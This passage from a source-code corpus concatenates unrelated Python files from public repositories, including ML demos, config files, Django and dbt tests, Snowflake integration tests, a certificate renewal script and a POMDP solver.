loss = _Loss.__call__(self, input, target, reduction, normalizer=normalizer_override, **kwargs)
return loss * self.loss_weight
def forward(self, input, target, reduction, normalizer=None, **kwargs):
raise NotImplementedError
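# Illustrative subclass (a sketch, not part of the original file; the class
# name and formula are assumptions): a concrete loss only implements forward()
# and delegates the reduction to _reduce.
#
#   class L1Loss(BaseLoss):
#       def forward(self, input, target, reduction, normalizer=None, **kwargs):
#           loss = (input - target).abs()
#           return _reduce(loss, reduction, normalizer=normalizer)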
|
mmhuman3d/data/data_converters/builder.py | ykk648/mmhuman3d | 472 | 12697711 | from mmcv.utils import Registry
DATA_CONVERTERS = Registry('data_converters')
def build_data_converter(cfg):
"""Build data converter."""
return DATA_CONVERTERS.build(cfg)
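# Illustrative usage (the converter type string is an assumption; any class
# registered via @DATA_CONVERTERS.register_module() works):
#   converter = build_data_converter(dict(type='SomeConverter', prefix='data'))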
|
tools/Sikuli/SelectStringsInText.sikuli/GoToProcedure.py | marmyshev/vanessa-automation | 296 | 12697737 | <gh_stars>100-1000
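# Reads the search string from the file passed as the first command-line
# argument (only the first line is used), then drives the foreground
# application: Ctrl+F, paste the string, Enter - jumping to that string.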
path2file = sys.argv[1]
file = open(path2file, 'r')
while True:
line = file.readline()
if not line:
break
stroka = unicode(line, 'utf-8')
type('f', KeyModifier.CTRL)
sleep(1)
paste(stroka)
sleep(1)
type(Key.ENTER)
sleep(1)
break
exit(0)
|
corehq/apps/users/management/commands/resync_location_user_data.py | dimagilg/commcare-hq | 471 | 12697739 | from django.core.management.base import BaseCommand
from dimagi.utils.couch.database import iter_docs
from corehq.apps.locations.models import SQLLocation
from corehq.apps.users.models import CommCareUser
class Command(BaseCommand):
help = "Re-syncs location user data for all mobile workers in the domain."
def add_arguments(self, parser):
parser.add_argument('domain')
def process_user(self, user):
if user.location_id:
user.set_location(SQLLocation.objects.get(location_id=user.location_id))
else:
user.unset_location()
def handle(self, domain, **options):
ids = (
CommCareUser.ids_by_domain(domain, is_active=True) +
CommCareUser.ids_by_domain(domain, is_active=False)
)
for doc in iter_docs(CommCareUser.get_db(), ids):
user = CommCareUser.wrap(doc)
try:
self.process_user(user)
except Exception as e:
print("Error processing user %s: %s" % (user._id, e))
|
examples/libtest/I18N/__init__.py | takipsizad/pyjs | 739 | 12697748 | <reponame>takipsizad/pyjs
class I18N(object):
def example(self):
return "This is an example"
def another_example(self):
return "This is another example"
i18n = I18N()
locale = 'en'
domains = []
import sys
import domain
domains.append('domain')
import domain.subdomain
domains.append('domain.subdomain')
def set_locale(loc):
global i18n
try:
path = "I18N.%s" % loc
c = __import__(path)
except ImportError, e:
print "Failed to import %s" % e
domains.sort()
for domain in domains:
try:
path = "I18N.%s.%s" % (domain, loc)
__import__(path)
except ImportError, e:
print "Failed to import %s" % e
|
exercises/zh/exc_01_08_01.py | Jette16/spacy-course | 2,085 | 12697750 | <gh_stars>1000+
import spacy
nlp = spacy.load("zh_core_web_sm")
text = "写入历史了:苹果是美国第一家市值超过一万亿美元的上市公司。"
# Process the text
doc = ____
for token in doc:
    # Get the token text, part-of-speech tag and dependency label
token_text = ____.____
token_pos = ____.____
token_dep = ____.____
    # Format the printed output nicely
print(f"{token_text:<12}{token_pos:<10}{token_dep:<10}")
|
zerver/tests/test_data_types.py | TylerPham2000/zulip | 17,004 | 12697755 | <reponame>TylerPham2000/zulip
from zerver.lib.data_types import (
DictType,
EnumType,
Equals,
ListType,
NumberType,
OptionalType,
StringDictType,
TupleType,
UnionType,
UrlType,
schema,
)
from zerver.lib.test_classes import ZulipTestCase
class MiscTest(ZulipTestCase):
def test_data_type_schema(self) -> None:
"""
We really only test this to get test coverage. The
code covered here is really only used in testing tools.
"""
test_schema = DictType(
[
("type", Equals("realm")),
("maybe_n", OptionalType(int)),
("s", str),
("timestamp", NumberType()),
("flag", bool),
("tup", TupleType([int, str])),
("level", EnumType([1, 2, 3])),
("lst", ListType(int)),
("config", StringDictType(str)),
("value", UnionType([int, str])),
("url", UrlType()),
]
)
expected = """
test (dict):
config (string_dict):
value: str
flag: bool
level in [1, 2, 3]
lst (list):
type: int
maybe_n: int
s: str
timestamp: number
tup (tuple):
0: int
1: str
type in ['realm']
url: str
value (union):
type: int
type: str
"""
self.assertEqual(schema("test", test_schema).strip(), expected.strip())
|
demo.py | voigta/RAFT-Stereo | 172 | 12697793 | <reponame>voigta/RAFT-Stereo
import sys
sys.path.append('core')
import argparse
import glob
import numpy as np
import torch
from tqdm import tqdm
from pathlib import Path
from raft_stereo import RAFTStereo
from utils.utils import InputPadder
from PIL import Image
from matplotlib import pyplot as plt
DEVICE = 'cuda'
def load_image(imfile):
img = np.array(Image.open(imfile)).astype(np.uint8)
img = torch.from_numpy(img).permute(2, 0, 1).float()
return img[None].to(DEVICE)
def demo(args):
model = torch.nn.DataParallel(RAFTStereo(args), device_ids=[0])
model.load_state_dict(torch.load(args.restore_ckpt))
model = model.module
model.to(DEVICE)
model.eval()
output_directory = Path(args.output_directory)
output_directory.mkdir(exist_ok=True)
with torch.no_grad():
left_images = sorted(glob.glob(args.left_imgs, recursive=True))
right_images = sorted(glob.glob(args.right_imgs, recursive=True))
print(f"Found {len(left_images)} images. Saving files to {output_directory}/")
for (imfile1, imfile2) in tqdm(list(zip(left_images, right_images))):
image1 = load_image(imfile1)
image2 = load_image(imfile2)
padder = InputPadder(image1.shape, divis_by=32)
image1, image2 = padder.pad(image1, image2)
_, flow_up = model(image1, image2, iters=args.valid_iters, test_mode=True)
file_stem = imfile1.split('/')[-2]
if args.save_numpy:
np.save(output_directory / f"{file_stem}.npy", flow_up.cpu().numpy().squeeze())
plt.imsave(output_directory / f"{file_stem}.png", -flow_up.cpu().numpy().squeeze(), cmap='jet')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--restore_ckpt', help="restore checkpoint", required=True)
parser.add_argument('--save_numpy', action='store_true', help='save output as numpy arrays')
parser.add_argument('-l', '--left_imgs', help="path to all first (left) frames", default="datasets/Middlebury/MiddEval3/testH/*/im0.png")
parser.add_argument('-r', '--right_imgs', help="path to all second (right) frames", default="datasets/Middlebury/MiddEval3/testH/*/im1.png")
parser.add_argument('--output_directory', help="directory to save output", default="demo_output")
parser.add_argument('--mixed_precision', action='store_true', help='use mixed precision')
parser.add_argument('--valid_iters', type=int, default=32, help='number of flow-field updates during forward pass')
# Architecture choices
parser.add_argument('--hidden_dims', nargs='+', type=int, default=[128]*3, help="hidden state and context dimensions")
parser.add_argument('--corr_implementation', choices=["reg", "alt", "reg_cuda", "alt_cuda"], default="reg", help="correlation volume implementation")
parser.add_argument('--shared_backbone', action='store_true', help="use a single backbone for the context and feature encoders")
parser.add_argument('--corr_levels', type=int, default=4, help="number of levels in the correlation pyramid")
parser.add_argument('--corr_radius', type=int, default=4, help="width of the correlation pyramid")
parser.add_argument('--n_downsample', type=int, default=2, help="resolution of the disparity field (1/2^K)")
parser.add_argument('--slow_fast_gru', action='store_true', help="iterate the low-res GRUs more frequently")
parser.add_argument('--n_gru_layers', type=int, default=3, help="number of hidden GRU levels")
args = parser.parse_args()
demo(args)
|
JetMETCorrections/Type1MET/python/pfMETCorrectionType0_cfi.py | ckamtsikis/cmssw | 852 | 12697796 | import FWCore.ParameterSet.Config as cms
#--------------------------------------------------------------------------------
# select collection of "good" collision vertices
selectedVerticesForPFMEtCorrType0 = cms.EDFilter("VertexSelector",
src = cms.InputTag('offlinePrimaryVertices'),
cut = cms.string("isValid & ndof >= 4 & chi2 > 0 & tracksSize > 0 & abs(z) < 24 & abs(position.Rho) < 2."),
filter = cms.bool(False)
)
selectedPrimaryVertexHighestPtTrackSumForPFMEtCorrType0 = cms.EDFilter("PATSingleVertexSelector",
mode = cms.string('firstVertex'),
vertices = cms.InputTag('selectedVerticesForPFMEtCorrType0'),
filter = cms.bool(False)
)
#--------------------------------------------------------------------------------
#--------------------------------------------------------------------------------
# association of PFCandidates to vertices
from RecoParticleFlow.PFTracking.particleFlowDisplacedVertex_cfi import particleFlowDisplacedVertex
from TrackingTools.TransientTrack.TransientTrackBuilder_cfi import *
from CommonTools.RecoUtils.pfcand_assomap_cfi import PFCandAssoMap as _PFCandAssoMap
pfCandidateToVertexAssociation = _PFCandAssoMap.clone(
PFCandidateCollection = cms.InputTag('particleFlow'),
UseBeamSpotCompatibility = cms.untracked.bool(True),
ignoreMissingCollection = cms.bool(True)
)
#--------------------------------------------------------------------------------
#--------------------------------------------------------------------------------
# produce Type 0 MET corrections
pfMETcorrType0 = cms.EDProducer("Type0PFMETcorrInputProducer",
srcPFCandidateToVertexAssociations = cms.InputTag('pfCandidateToVertexAssociation'),
srcHardScatterVertex = cms.InputTag('selectedPrimaryVertexHighestPtTrackSumForPFMEtCorrType0'),
correction = cms.PSet(
# RunI correction
# formula = cms.string("-([0] + [1]*x)*(1.0 + TMath::Erf(-[2]*TMath::Power(x, [3])))"),
# par0 = cms.double(0.),
# par1 = cms.double(-0.703151),
# par2 = cms.double(0.0303531),
# par3 = cms.double(0.909209)
formula = cms.string("(x<35)?(-( [0]+x*[1]+pow(x, 2)*[2]+pow(x, 3)*[3] )):(-( [0]+35*[1]+pow(35, 2)*[2]+pow(35, 3)*[3] ))"),
par0 = cms.double(-1.81414e-01),
par1 = cms.double(-4.76934e-01),
par2 = cms.double(8.63564e-03),
par3 = cms.double(-4.94181e-05)
),
minDz = cms.double(0.2) # [cm], minimum distance required between pile-up vertices and "hard scatter" vertex
)
#--------------------------------------------------------------------------------
type0PFMEtCorrectionPFCandToVertexAssociationTask = cms.Task(
selectedVerticesForPFMEtCorrType0,
selectedPrimaryVertexHighestPtTrackSumForPFMEtCorrType0,
particleFlowDisplacedVertex,
pfCandidateToVertexAssociation
)
type0PFMEtCorrectionPFCandToVertexAssociation = cms.Sequence(
type0PFMEtCorrectionPFCandToVertexAssociationTask
)
type0PFMEtCorrectionPFCandToVertexAssociationForValidation = cms.Sequence(
type0PFMEtCorrectionPFCandToVertexAssociationTask
)
type0PFMEtCorrectionPFCandToVertexAssociationForValidationMiniAOD = cms.Sequence(
type0PFMEtCorrectionPFCandToVertexAssociationTask
)
type0PFMEtCorrectionTask = cms.Task(
type0PFMEtCorrectionPFCandToVertexAssociationTask,
pfMETcorrType0
)
type0PFMEtCorrection = cms.Sequence(
type0PFMEtCorrectionTask
)
|
src/zvt/recorders/sina/money_flow/__init__.py | vishalbelsare/zvt | 2,032 | 12697817 | # the __all__ is generated
__all__ = []
# __init__.py structure:
# common code of the package
# export interface in __all__ which contains __all__ of its sub modules
# import all from submodule sina_block_money_flow_recorder
from .sina_block_money_flow_recorder import *
from .sina_block_money_flow_recorder import __all__ as _sina_block_money_flow_recorder_all
__all__ += _sina_block_money_flow_recorder_all
# import all from submodule sina_stock_money_flow_recorder
from .sina_stock_money_flow_recorder import *
from .sina_stock_money_flow_recorder import __all__ as _sina_stock_money_flow_recorder_all
__all__ += _sina_stock_money_flow_recorder_all
|
examples/misc/flaskexamples/flaskcelery/flask_source/FlaskEchoApp.py | takipsizad/pyjs | 739 | 12697822 | <reponame>takipsizad/pyjs
from flask import Flask
from requests import JSONRPCRequest
from views import json_echo, echo
from method_views import JSONEchoView
Flask.request_class = JSONRPCRequest
def create_app():
app = Flask("FlaskEchoApp")
app.config.from_pyfile("celeryconfig.py")
# Register the blueprint version of the echoer
app.register_blueprint(json_echo, url_prefix="/json_echo")
# Register the modelview version of the echoer
app.add_url_rule(
"/json_echo_class", view_func=JSONEchoView.as_view("json_echo_class"))
return app
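# Typical use of the factory (a sketch; the run configuration is an assumption):
#   app = create_app()
#   app.run()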
|
exercises/crypto-square/crypto_square.py | kishankj/python | 1,177 | 12697838 | def cipher_text(plain_text):
pass
|
actions/list_users.py | cognifloyd/stackstorm-yammer | 164 | 12697849 | <filename>actions/list_users.py
from lib.actions import YammerAction
__all__ = [
'ListUsersAction'
]
class ListUsersAction(YammerAction):
def run(self, page=None, letter=None,
sort_by=None, reverse=None):
yammer = self.authenticate()
users = yammer.users.all(page=page, letter=letter, sort_by=sort_by,
reverse=reverse)
return users
|
static/scripts/renew_certs.py | qbert2k/jans-setup | 178 | 12697878 | <gh_stars>100-1000
import os
prop_file = '/install/community-edition-setup/setup.properties.last'
prop = {}
for l in open(prop_file):
ls=l.strip()
n = ls.find('=')
if not ls.startswith('#'):
key = ls[:n]
val = ls[n+1:].strip()
val = val.replace('\\=','=').replace('\\:',':')
prop[key] = val
def delete_key(suffix):
defaultTrustStorePW = '<PASSWORD>'
defaultTrustStoreFN = '/opt/jre/jre/lib/security/cacerts'
cert = '/etc/certs/{0}.crt'.format(suffix)
if os.path.exists(cert):
cmd=' '.join([
'/opt/jre/bin/keytool', "-delete", "-alias",
"%s_%s" % (prop['hostname'], suffix),
"-keystore", defaultTrustStoreFN,
"-storepass", defaultTrustStorePW
])
os.system(cmd)
def import_key(suffix):
defaultTrustStorePW = '<PASSWORD>'
defaultTrustStoreFN = '/opt/jre/jre/lib/security/cacerts'
certFolder = '/etc/certs'
public_certificate = '%s/%s.crt' % (certFolder, suffix)
cmd =' '.join([
'/opt/jre/bin/keytool', "-import", "-trustcacerts",
"-alias", "%s_%s" % (prop['hostname'], suffix),
"-file", public_certificate, "-keystore",
defaultTrustStoreFN,
"-storepass", defaultTrustStorePW, "-noprompt"
])
os.system(cmd)
def create_new_certs():
print "Creating certificates"
cmd_list = [
'/usr/bin/openssl genrsa -des3 -out /etc/certs/{0}.key.orig -passout pass:secret 2048',
'/usr/bin/openssl rsa -in /etc/certs/{0}.key.orig -passin pass:secret -out /etc/certs/{0}.key',
'/usr/bin/openssl req -new -key /etc/certs/{0}.key -out /etc/certs/{0}.csr -subj '
'"/C={4}/ST={5}/L={1}/O=Gluu/CN={2}/emailAddress={3}"'.format('{0}', prop['city'], prop['hostname'], prop['admin_email'] , prop['countryCode'] , prop['state']),
'/usr/bin/openssl x509 -req -days 365 -in /etc/certs/{0}.csr -signkey /etc/certs/{0}.key -out /etc/certs/{0}.crt',
'chown root:gluu /etc/certs/{0}.key.orig',
'chmod 700 /etc/certs/{0}.key.orig',
'chown root:gluu /etc/certs/{0}.key',
'chmod 700 /etc/certs/{0}.key',
]
cert_list = ['httpd', 'asimba', 'idp-encryption', 'idp-signing', 'shibIDP', 'saml.pem']
for crt in cert_list:
for cmd in cmd_list:
cmd = cmd.format(crt)
os.system(cmd)
if not crt == 'saml.pem':
delete_key(crt)
import_key(crt)
os.rename('/etc/certs/saml.pem.crt', '/etc/certs/saml.pem')
os.system('chown jetty:jetty /etc/certs/oxauth-keys.*')
create_new_certs()
|
setup.py | PingCheng-Wei/SD-MaskRCNN | 183 | 12697966 | <gh_stars>100-1000
"""
Setup of SD Mask RCNN codebase
Author: <NAME>
"""
import os
from setuptools import setup
root_dir = os.path.dirname(os.path.realpath(__file__))
# load __version__
version_file = 'sd_maskrcnn/version.py'
exec(open(version_file).read())
# load README.md as long_description
long_description = ''
if os.path.exists('README.md'):
with open('README.md', 'r') as f:
long_description = f.read()
setup_requirements = [
'Cython',
'numpy'
]
requirements = [
'pycocotools>=2.0', # For benchmarking
'scikit-image>=0.14.2', # For image loading
    'keras>=2.2,<2.3',                  # For training
'tqdm', # For pretty progress bars
'matplotlib', # For visualization of results
'h5py<3.0.0', # Loading pretrained models
'autolab_core>=1.1.0', # For core utilities
'nvidia-tensorflow', # For training - need TF 1.15 so use nvidia
f'mask-rcnn @ file://localhost{root_dir}/maskrcnn'
# Underlying Mask RCNN model
]
generation_requirements = [
'gym>=0.11', # For sampling heaps
'pyglet==1.4.0b1', # For pyrender
'pyrender>=0.1.23', # For rendering images
'pybullet', # For dynamic sim
'trimesh[easy]', # For mesh loading/exporting
'scipy' # For random vars
]
setup(
name='sd_maskrcnn',
version=__version__,
description='SD Mask RCNN project code',
long_description=long_description,
long_description_content_type='text/markdown',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
url='http://github.com/BerkeleyAutomation/sd-maskrcnn',
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
'Natural Language :: English',
'Topic :: Scientific/Engineering'
],
packages=['sd_maskrcnn', 'sd_maskrcnn.envs'],
package_data={'sd_maskrcnn': ['data/plane/*', 'data/bin/*']},
setup_requires=setup_requirements,
install_requires=requirements,
extras_require={
'generation': generation_requirements
}
)
|
test/integ/test_put_get_with_aws_token.py | jurecuhalev/snowflake-connector-python | 311 | 12698010 | <filename>test/integ/test_put_get_with_aws_token.py<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012-2021 Snowflake Computing Inc. All rights reserved.
#
import glob
import gzip
import os
import pytest
from snowflake.connector.constants import UTF8
try: # pragma: no cover
from snowflake.connector.vendored import requests
except ImportError:
requests = None
try: # pragma: no cover
from snowflake.connector.file_transfer_agent import (
SnowflakeFileMeta,
StorageCredential,
)
from snowflake.connector.s3_storage_client import S3Location, SnowflakeS3RestClient
except ImportError:
pass
from ..integ_helpers import put
from ..randomize import random_string
# Mark every test in this module as an aws test
pytestmark = pytest.mark.aws
@pytest.mark.parametrize(
"from_path", [True, pytest.param(False, marks=pytest.mark.skipolddriver)]
)
def test_put_get_with_aws(tmpdir, conn_cnx, from_path):
"""[s3] Puts and Gets a small text using AWS S3."""
# create a data file
fname = str(tmpdir.join("test_put_get_with_aws_token.txt.gz"))
original_contents = "123,test1\n456,test2\n"
with gzip.open(fname, "wb") as f:
f.write(original_contents.encode(UTF8))
tmp_dir = str(tmpdir.mkdir("test_put_get_with_aws_token"))
table_name = random_string(5, "snow9144_")
with conn_cnx() as cnx:
with cnx.cursor() as csr:
try:
csr.execute(f"create or replace table {table_name} (a int, b string)")
file_stream = None if from_path else open(fname, "rb")
put(
csr,
fname,
f"%{table_name}",
from_path,
sql_options=" auto_compress=true parallel=30",
file_stream=file_stream,
)
rec = csr.fetchone()
assert rec[6] == "UPLOADED"
csr.execute(f"copy into {table_name}")
csr.execute(f"rm @%{table_name}")
assert csr.execute(f"ls @%{table_name}").fetchall() == []
csr.execute(
f"copy into @%{table_name} from {table_name} "
"file_format=(type=csv compression='gzip')"
)
csr.execute(f"get @%{table_name} file://{tmp_dir}")
rec = csr.fetchone()
assert rec[0].startswith("data_"), "A file downloaded by GET"
assert rec[1] == 36, "Return right file size"
assert rec[2] == "DOWNLOADED", "Return DOWNLOADED status"
assert rec[3] == "", "Return no error message"
finally:
csr.execute(f"drop table {table_name}")
if file_stream:
file_stream.close()
files = glob.glob(os.path.join(tmp_dir, "data_*"))
with gzip.open(files[0], "rb") as fd:
contents = fd.read().decode(UTF8)
assert original_contents == contents, "Output is different from the original file"
@pytest.mark.skipolddriver
def test_put_with_invalid_token(tmpdir, conn_cnx):
"""[s3] SNOW-6154: Uses invalid combination of AWS credential."""
# create a data file
fname = str(tmpdir.join("test_put_get_with_aws_token.txt.gz"))
with gzip.open(fname, "wb") as f:
f.write("123,test1\n456,test2".encode(UTF8))
table_name = random_string(5, "snow6154_")
with conn_cnx() as cnx:
try:
cnx.cursor().execute(
f"create or replace table {table_name} (a int, b string)"
)
ret = cnx.cursor()._execute_helper(f"put file://{fname} @%{table_name}")
stage_info = ret["data"]["stageInfo"]
stage_info["location"]
stage_credentials = stage_info["creds"]
creds = StorageCredential(
stage_credentials, cnx, "COMMAND WILL NOT BE USED"
)
statinfo = os.stat(fname)
meta = SnowflakeFileMeta(
name=os.path.basename(fname),
src_file_name=fname,
src_file_size=statinfo.st_size,
stage_location_type="S3",
encryption_material=None,
dst_file_name=os.path.basename(fname),
sha256_digest="None",
)
client = SnowflakeS3RestClient(meta, creds, stage_info, 8388608)
client.get_file_header(meta.name) # positive case
# negative case, no aws token
token = stage_info["creds"]["AWS_TOKEN"]
del stage_info["creds"]["AWS_TOKEN"]
with pytest.raises(requests.HTTPError, match=".*Forbidden for url.*"):
client.get_file_header(meta.name)
# negative case, wrong location
stage_info["creds"]["AWS_TOKEN"] = token
s3path = client.s3location.path
bad_path = os.path.dirname(os.path.dirname(s3path)) + "/"
_s3location = S3Location(client.s3location.bucket_name, bad_path)
client.s3location = _s3location
client.chunks = [b"this is a chunk"]
client.num_of_chunks = 1
client.retry_count[0] = 0
client.data_file = fname
with pytest.raises(requests.HTTPError, match=".*Forbidden for url.*"):
client.upload_chunk(0)
finally:
cnx.cursor().execute(f"drop table if exists {table_name}")
|
tests/functional/context_methods/test_var_in_generate_name.py | tomasfarias/dbt-core | 799 | 12698036 | import pytest
from dbt.tests.util import run_dbt, update_config_file
from dbt.exceptions import CompilationException
model_sql = """
select 1 as id
"""
bad_generate_macros__generate_names_sql = """
{% macro generate_schema_name(custom_schema_name, node) -%}
{% do var('somevar') %}
{% do return(dbt.generate_schema_name(custom_schema_name, node)) %}
{%- endmacro %}
"""
class TestMissingVarGenerateNameMacro:
@pytest.fixture(scope="class")
def macros(self):
return {"generate_names.sql": bad_generate_macros__generate_names_sql}
@pytest.fixture(scope="class")
def models(self):
return {"model.sql": model_sql}
def test_generate_schema_name_var(self, project):
# var isn't set, so generate_name macro fails
with pytest.raises(CompilationException) as excinfo:
run_dbt(["compile"])
assert "Required var 'somevar' not found in config" in str(excinfo.value)
# globally scoped -- var is set at top-level
update_config_file({"vars": {"somevar": 1}}, project.project_root, "dbt_project.yml")
run_dbt(["compile"])
# locally scoped -- var is set in 'test' scope
update_config_file(
{"vars": {"test": {"somevar": 1}}}, project.project_root, "dbt_project.yml"
)
run_dbt(["compile"])
|
pomdpy/solvers/linear_alpha_net.py | watabe951/POMDPy | 210 | 12698040 | from __future__ import absolute_import
import os
import numpy as np
import tensorflow as tf
from experiments.scripts.pickle_wrapper import save_pkl, load_pkl
from .ops import simple_linear, select_action_tf, clipped_error
from .alpha_vector import AlphaVector
from .base_tf_solver import BaseTFSolver
class LinearAlphaNet(BaseTFSolver):
"""
Linear Alpha Network
- linear FA for alpha vectors
- 6 inputs (r(s,a))
- 6 outputs (1 hyperplane per action)
"""
def __init__(self, agent, sess):
super(LinearAlphaNet, self).__init__(agent, sess)
self.ops = {}
self.w = {}
self.summary_ops = {}
self.summary_placeholders = {}
self.w_input = {}
self.w_assign_op = {}
self.build_linear_network()
with tf.variable_scope('step'):
self.step_op = tf.Variable(0, trainable=False, name='step')
self.step_input = tf.placeholder('int32', None, name='step_input')
self.step_assign_op = self.step_op.assign(self.step_input)
tf.global_variables_initializer().run()
@staticmethod
def reset(agent, sess):
return LinearAlphaNet(agent, sess)
def train(self, epoch):
start_step = self.step_assign_op.eval({self.step_input: epoch * self.model.max_steps})
total_reward, avg_reward_per_step, total_loss, total_v, total_delta = 0., 0., 0., 0., 0.
actions = []
# Reset for new run
belief = self.model.get_initial_belief_state()
for step in range(start_step, start_step + self.model.max_steps):
# 1. predict
action, pred_v = self.e_greedy_predict(belief, step)
# 2. act
step_result = self.model.generate_step(action)
if step_result.is_terminal:
v_b_next = np.array([0.])
else:
next_belief = self.model.belief_update(belief, action, step_result.observation)
# optionally clip reward
# generate target
_, v_b_next = self.greedy_predict(next_belief)
target_v = self.model.discount * (step_result.reward + v_b_next)
# compute gradient and do weight update
_, loss, delta = self.gradients(target_v, belief, step)
total_loss += loss
total_reward += step_result.reward
total_v += pred_v[0]
total_delta += delta[0]
if step_result.is_terminal:
# Reset for new run
belief = self.model.get_initial_belief_state()
actions.append(action)
avg_reward_per_step = total_reward / (step + 1.)
            avg_loss = total_loss / (step + 1.)
avg_v = total_v / (step + 1.)
avg_delta = total_delta / (step + 1.)
self.step_assign_op.eval({self.step_input: step + 1})
self.inject_summary({
'average.reward': avg_reward_per_step,
'average.loss': avg_loss,
'average.v': avg_v,
'average.delta': avg_delta,
'training.weights': self.sess.run(self.w['l1_w'], feed_dict={
self.ops['l0_in']: np.reshape(self.model.get_reward_matrix().flatten(), [1, 6]),
self.ops['belief']: belief}),
'training.learning_rate': self.ops['learning_rate_op'].eval(
{self.ops['learning_rate_step']: step + 1}),
'training.epsilon': self.ops['epsilon_op'].eval(
{self.ops['epsilon_step']: step + 1})
}, step + 1)
def e_greedy_predict(self, belief, epsilon_step):
# try hard-coding input of linear net to be rewards (can try random as well)
action, v_b, epsilon = self.sess.run([self.ops['a'], self.ops['v_b'], self.ops['epsilon_op']],
feed_dict={
self.ops['l0_in']: np.reshape(self.model.get_reward_matrix().flatten(), [1, 6]),
self.ops['belief']: belief,
self.ops['epsilon_step']: epsilon_step})
# e-greedy action selection
if np.random.uniform(0, 1) < epsilon:
action = np.random.randint(self.model.num_actions)
return action, v_b
def greedy_predict(self, belief):
# try hard-coding input of linear net to be rewards (can try random as well)
action, v_b = self.sess.run([self.ops['a'], self.ops['v_b']],
feed_dict={
self.ops['l0_in']: np.reshape(self.model.get_reward_matrix().flatten(), [1, 6]),
self.ops['belief']: belief})
return action, v_b
def gradients(self, target_v, belief, learning_rate_step):
return self.sess.run([self.ops['optim'], self.ops['loss'], self.ops['delta']], feed_dict={
self.ops['target_v']: target_v,
self.ops['l0_in']: np.reshape(self.model.get_reward_matrix().flatten(), [1, 6]),
self.ops['belief']: belief,
self.ops['learning_rate_step']: learning_rate_step})
def alpha_vectors(self):
gamma = self.sess.run(self.ops['l1_out'], feed_dict={
self.ops['l0_in']: np.reshape(self.model.get_reward_matrix().flatten(), [1, 6]),
self.ops['belief']: self.model.get_initial_belief_state()
})
gamma = np.reshape(gamma, [self.model.num_actions, self.model.num_states])
vector_set = set()
for i in range(self.model.num_actions):
vector_set.add(AlphaVector(a=i, v=gamma[i]))
return vector_set
def build_linear_network(self):
with tf.variable_scope('linear_fa_prediction'):
self.ops['belief'] = tf.placeholder('float32', [self.model.num_states], name='belief_input')
with tf.name_scope('linear_layer'):
self.ops['l0_in'] = tf.placeholder('float32', [1, self.model.num_states *
self.model.num_actions], name='input')
self.ops['l1_out'], self.w['l1_w'], self.w['l1_b'] = simple_linear(self.ops['l0_in'],
activation_fn=None, name='weights')
self.ops['l1_out'] = tf.reshape(self.ops['l1_out'], [self.model.num_actions,
self.model.num_states], name='output')
with tf.variable_scope('action_selection'):
vector_set = set()
for i in range(self.model.num_actions):
vector_set.add(AlphaVector(a=i, v=self.ops['l1_out'][i, :]))
self.ops['a'], self.ops['v_b'] = select_action_tf(self.ops['belief'], vector_set)
with tf.variable_scope('epsilon_greedy'):
self.ops['epsilon_step'] = tf.placeholder('int64', None, name='epsilon_step')
self.ops['epsilon_op'] = tf.maximum(self.model.epsilon_minimum,
tf.train.exponential_decay(
self.model.epsilon_start,
self.ops['epsilon_step'],
self.model.epsilon_decay_step,
self.model.epsilon_decay,
staircase=True))
with tf.variable_scope('linear_optimizer'):
# MSE loss function
self.ops['target_v'] = tf.placeholder('float32', [None], name='target_v')
self.ops['delta'] = self.ops['target_v'] - self.ops['v_b']
# self.ops['clipped_delta'] = tf.clip_by_value(self.ops['delta'], -1, 1, name='clipped_delta')
# L2 regularization
self.ops['loss'] = tf.reduce_mean(clipped_error(self.ops['delta']) +
self.model.beta * tf.nn.l2_loss(self.w['l1_w']) +
self.model.beta * tf.nn.l2_loss(self.w['l1_b']), name='loss')
self.ops['learning_rate_step'] = tf.placeholder('int64', None, name='learning_rate_step')
self.ops['learning_rate_op'] = tf.maximum(self.model.learning_rate_minimum,
tf.train.exponential_decay(
self.model.learning_rate,
self.ops['learning_rate_step'],
self.model.learning_rate_decay_step,
self.model.learning_rate_decay,
staircase=True))
self.ops['optim'] = tf.train.MomentumOptimizer(self.ops['learning_rate_op'], momentum=0.8,
name='Optimizer'). \
minimize(self.ops['loss'])
with tf.variable_scope('linear_fa_summary'):
scalar_summary_tags = ['average.reward', 'average.loss', 'average.v',
'average.delta', 'training.learning_rate', 'training.epsilon']
for tag in scalar_summary_tags:
self.summary_placeholders[tag] = tf.placeholder('float32', None, name=tag.replace(' ', '_'))
self.summary_ops['{}'.format(tag)] = tf.summary.scalar('{}'.format(tag),
self.summary_placeholders[tag])
self.summary_placeholders['training.weights'] = tf.placeholder('float32', [1, 6],
name='training_weights')
self.summary_ops['training.weights'] = tf.summary.histogram('weights',
self.summary_placeholders['training.weights'])
self.summary_ops['writer'] = tf.summary.FileWriter(self.model.logs, self.sess.graph)
self.summary_ops['saver'] = tf.train.Saver(self.w, max_to_keep=30)
self.load_model()
def inject_summary(self, tag_dict, step):
summary_str_lists = self.sess.run([self.summary_ops['{}'.format(tag)] for tag in tag_dict.keys()], feed_dict={
self.summary_placeholders[tag]: value for tag, value in tag_dict.items()
})
for summary_str in summary_str_lists:
self.summary_ops['writer'].add_summary(summary_str, step)
def save_weight_to_pkl(self):
if not os.path.exists(self.model.weight_dir):
os.makedirs(self.model.weight_dir)
for name in self.w.keys():
save_pkl(self.w[name].eval(), os.path.join(self.model.weight_dir, "%s.pkl" % name))
def load_weight_from_pkl(self):
with tf.variable_scope('load_pred_from_pkl'):
for name in self.w.keys():
self.w_input[name] = tf.placeholder('float32', self.w[name].get_shape().as_list(), name=name)
self.w_assign_op[name] = self.w[name].assign(self.w_input[name])
for name in self.w.keys():
self.w_assign_op[name].eval({self.w_input[name]: load_pkl(os.path.join(self.model.weight_dir, "%s.pkl" % name))})
def save_alpha_vectors(self):
if not os.path.exists(self.model.weight_dir):
os.makedirs(self.model.weight_dir)
av = self.alpha_vectors()
save_pkl(av, os.path.join(self.model.weight_dir, "linear_alpha_net_vectors.pkl"))
|
plans/management/commands/autorenew_accounts.py | feedgurus/django-plans | 240 | 12698050 | from django.core.management import BaseCommand
from plans import tasks
class Command(BaseCommand):
help = 'Autorenew accounts and with recurring payments'
def handle(self, *args, **options): # pragma: no cover
self.stdout.write("Starting renewal")
renewed_accounts = tasks.autorenew_account()
if renewed_accounts:
self.stdout.write("Accounts autorenewed: " + ", ".join(str(s) for s in renewed_accounts))
else:
